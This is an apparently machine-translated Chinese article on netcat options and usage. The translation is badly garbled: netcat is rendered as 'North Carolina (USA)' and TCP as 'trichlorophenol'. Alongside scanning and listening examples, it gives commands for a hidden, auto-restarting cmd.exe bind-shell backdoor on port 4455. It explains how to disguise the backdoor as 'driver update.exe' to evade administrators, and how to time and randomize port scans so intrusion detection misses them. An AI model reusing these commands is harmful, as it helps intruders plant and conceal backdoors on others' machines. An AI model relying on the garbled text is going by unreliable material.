netcat命令，netcat很多人还不知道，乐乐来为大家解答以上问题，现在让我们一起来看看吧！

1、 （美国）北卡罗来纳州的全称为NetCat，它能够建立并接受传输控制协议(TCP)和用户数据报协议(UDP)的连接，Netcat可在这些连接上读写数据，直到连接关闭为止。它可以通过手工或者脚本与应用层的网络应用程序或服务进行交互。从技术上来讲，NetCat并不能产生用户数据报协议(User Datagram Protocol)连接，因为用户数据报协议(User Datagram Protocol)是一种无连接的协议NetCat . com。没有图形界面，很粗糙，很原始。

2、 （美国）北卡罗来纳州的命令行

3、 （美国）北卡罗来纳州的基本命令行形式是NC[选项]主机端口，其中宿主是要扫描的主机名或互联网协议(Internet Protocol)地址，端口要么是一个单独的端口，要么是一个端口范围（用男男的形式指定),要么是一系列用空格隔开的单个端口。

4、 -d只对Windows操作系统操作系统有用，该选项使网络瑞士军刀以隐蔽模式工作，从而脱离微软磁盘操作系统命令提示符下环境运行，使得（美国）北卡罗来纳州不需要保持打开命令窗口便可在监听模式下运行，也可以帮助黑客很好地隐藏监听网络瑞士军刀实例而不被系统管理员发现。

5、 -e如果网络瑞士军刀使用安全漏洞选项进行编译，那么只要某人在网后台所监听的任何端口上建立连接，该网络瑞士军刀都将执行，且客户端的网络瑞士军刀会通过管道将输入输出传输到在别处监听的另一个网络瑞士军刀实例中。使用这个选项非常危险，除非你对（美国）北卡罗来纳州相当了解，起码知道你自己在做什么。这是在系统中建立后门壳的一个非常快捷且容易的方法。

6、 构成来自拉丁语、结尾为-us的名词的复数延时间隔，表示在两次数据发送之间（美国）北卡罗来纳州等待的时间。例如：当经过管道传输一个文件到（美国）北卡罗来纳州的时候，在传输输入的下一行之前，数控将等待的秒数。当使用（美国）北卡罗来纳州对一台主机的多个端口之间进行操作时，在切换到下一个端口之前，数控等待的秒数。这样可以使黑客在进行数据传输或对一个服务进行攻击的时候更加隐蔽，也可以帮助你的端口扫描不被入侵检测系统和系统管理员发现。

7、 -g这个选项具有欺骗性nc。支持松散源路由(松散源路由)。你可以在命令行中指定多达8个-g选项来强迫（美国）北卡罗来纳州流量经过特定的互联网协议(Internet Protocol)地址，这在你为流量设置伪造的源互联网协议(Internet Protocol)地址时，可以利用这个方法达到通过防火墙的过滤器或者允许访问主机列表，希望接收到从主机返回的响应。

8、 -G该选项让用户在-g选项所指定的路由列表中指定的一个地址作为当前的下一路由，由于互联网协议(Internet Protocol)地址为四字节大小(IPV4)，所以这个参数总是四字节的倍数；例如，4代表路由表中的第一个互联网协议(Internet Protocol)地址，8代表第二个互联网协议(Internet Protocol)地址，依次类推。这在伪造部分源路由表使得报文看起来相当的有用。在进行欺骗和源路由时，这个功能有助于屏蔽你的位置，但也不一定能接收到响应报文，因为响应报文将经过由伪造的互联网协议(Internet Protocol)地址反路由回来。

9、 -我该选项切换（美国）北卡罗来纳州的监听模式。此选项必须与-p选项一起使用以告诉（美国）北卡罗来纳州绑定某个指定的三氯苯酚端口并等待到来的连接。若换成-你选项，则应使用用户数据报协议(User Datagram Protocol)端口而非三氯苯酚端口。

10、 -我该选项在Windows操作系统版本中有用，当一个连接被关闭后，使用相同的命令行选项进行重启监听模式，即使此时初始的连接已经结束，数控也能在不需要用户干涉的情况下接收后面新的连接。与-我一样，必须与-p同时使用。

11、 同-EN该选项告诉我们（美国）北卡罗来纳州不做任何主机名查找的工作。

12、 -0对数据执行一次十六进制转储(十六进制转储)并将其存储在hexfile中。命令nc-o hexfile将把双向通信的数据记录下来，在每行的开始处会有一个"'或"用来分别指示是进入数据还是外出数据。如果只想得到对进入数据的十六进制转储，可以使用NC-ohex文件命令。

13、 -p让用户指定一个（美国）北卡罗来纳州应使用的本地端口号。当通过-我或-我选项来使用监听模式的时候，这个参数是必需的。如果没有为外出连接指定这个参数，则与大多数其他三氯苯酚或用户数据报协议(User Datagram Protocol)客户程序的做法一样，数控将使用系统分配给他的任何端口。

14、 -r该参数使（美国）北卡罗来纳州可以随机选择本地和远程端口。当使用（美国）北卡罗来纳州在系统中范围很大的一批端口上获取信息时，要想混合源端口和目标端口的顺序看起来不怎么象端口扫描，这个选项是很有用的。当这个选项与构成来自拉丁语、结尾为-us的名词的复数选项和一个足够大的间隔结合使用的时候，在不被注意的端口扫描成功几率能得到很大提升。

15、 构成名词复数指定（美国）北卡罗来纳州建立连接时所使用的互联网协议(Internet Protocol)地址，该选项允许黑客做一些工作，它允许黑客隐藏他们的互联网协议(Internet Protocol)地址或假冒他人的互联网协议(Internet Protocol)地址，但是要得到路由到他们所欺骗的地址的任何信息，都需要使用-g源路由选项。其次，当处于监听模式时，大多数情况下都可以与一个已经监听的服务"预先绑定",所有三氯苯酚和用户数据报协议(User Datagram Protocol)服务都绑定到某个端口。

16、 相当于-ED如果使用远程登录选项编译，数控就可以与远程登录服务器进行远程登录选项协商，虽然它的响应是毫无意义的信息，但可以通过该状态看到连接23端口的信息。

17、 -北卡罗来纳大学使用用户数据报协议(User Datagram Protocol)而非TCP，在客户模式和监听模式下都起作用。

18、 -v控制（美国）北卡罗来纳州将要做的事情达到的程度，如使用nc -v，那么（美国）北卡罗来纳州将仅吐出它所接收到的数据，一个单独的-v可以知道它连接或绑定的地址是否有问题发生，第2个-v可以让（美国）北卡罗来纳州在一个连接结束的时候让你知道这个连接总共发送和接收了多少数据。

19、 -w控制在一个连接上（美国）北卡罗来纳州放弃之前等待的时间。同时也告诉（美国）北卡罗来纳州当在标准输入上接收到一个文件结束之后应该等待多长时间来关闭连接并退出。如果你通过（美国）北卡罗来纳州向远程服务器发送命令并且期望大量的数据返回（例如：向一台网服务器发送一个超文本传送协议（Hyper Text Transport Protocol的缩写）命令以下载一个大文件),该选项是很有用的。

20、 （美国）北卡罗来纳州的具体使用

21、 c:NC . exe-l-p 4455-d-e cmd.exe可以很好的隐藏一个网络瑞士军刀后门。

22、 丙：数控执行-p 4455-d-L-e cmd.exe这个命令可以让黑客利用网络瑞士军刀重新返回系统，直到系统管理员在任务管理器中看见nc.exe在运行，从而发现这个后门，我们一样可以把它做的更加隐蔽，

23、 c:移动nc.exe c:windows system 32 driver update . exe

24、 c:windows系统32 driver update . exe-p 4455-d-L-e cmd.exe

25、 系统管理员可能把特权附属于一些无害的程序，如update.exe等，黑客也可以隐藏命令行。

26、 c:windowssystme 32 driver update . exe

27、 cmd线：-L-p 4455-d-L-e cmd.exe

28、 丙：

29、 nc -l - p 80监听80端口

30、 nc -l -p 80 c:log.dat监听80端口，并把信息记录到log.dat中

31、 数控v -l -p 80监听80端口，并显示端口信息

32、 nc -vv -l -p 80监听80端口，显示更详细的端口信息

33、 NC-l-p 80-t-e cmd.exe监听本地的80端口的入站信息，同时将cmd.exe重定向到80端口，当有人连接的时候，就让cmd.exe以远程登录的形式应答。当然这个最好用在控制的肉鸡上。

34、 nc -v ip端口扫瞄某互联网协议(Internet Protocol)的某个端口

35、 nc -v -z ip端口-端口扫描某互联网协议(Internet Protocol)的端口到某端口

36、 nc -v -z -u ip端口扫描某互联网协议(Internet Protocol)的某用户数据报协议(User Datagram Protocol)端口到某用户数据报协议(User Datagram Protocol)端口

今天的分享，希望对大家有所帮助。

标签：